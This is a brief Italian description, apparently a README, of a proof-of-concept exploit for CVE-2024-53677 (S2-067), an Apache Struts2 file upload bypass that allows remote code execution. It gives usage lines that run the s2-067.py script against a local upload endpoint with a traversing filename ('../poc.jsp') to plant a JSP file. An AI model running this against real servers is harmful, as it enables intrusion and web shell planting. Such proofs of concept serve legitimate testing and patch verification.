
Proof-of-concept exploit per CVE-2024-53677 (S2-067), un bypass della logica di upload file di Apache Struts2 che consente l'esecuzione remota di codice tramite parametri filename appositamente predisposti.
python3 s2-067.py -h
python3 s2-067.py -u http://localhost:28080/uploadFile -filename ../poc.jsp -file 2.jsp -type s
